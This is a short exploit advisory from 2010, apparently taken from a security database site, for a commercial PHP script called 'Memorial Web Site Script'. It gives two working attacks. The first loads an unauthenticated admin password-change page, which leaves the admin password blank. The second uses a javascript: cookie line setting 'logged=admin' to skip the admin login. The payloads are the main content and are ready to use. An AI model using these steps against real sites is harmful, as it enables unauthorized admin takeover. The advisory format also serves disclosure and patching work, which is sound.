Memorial Web Site Script password reset and insecure cookie handling

2010.04.25
Credit: Chip D3 Bi0s
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

----------------------------------------------------------------------- Memorial Web Site Script --> Reset Password & Insecure Cookie Handling ----------------------------------------------------------------------- Author : Chip D3 Bi0s Email : chipdebios[alt+64]gmail.com Where : From Remote Group : LatinHackTeam Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Memorial Web Site Script Author : Easy Scripts Price : $49 Vendor : http://www.easy-scripts.net description Bug: ~~~~~~~~~~~~~~~ To reset the password just use this: http://127.0.0.1/[path]/admin/change_pass.php so the password will be null, login with single user can admin: http://127.0.0.1/[path]/admin/ -------------------------- Insecure Cookie Handling exploit: javascript:document.cookie="logged=admin;path=/"; http://127.0.0.1/[path]/admin/ -------------------------- +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top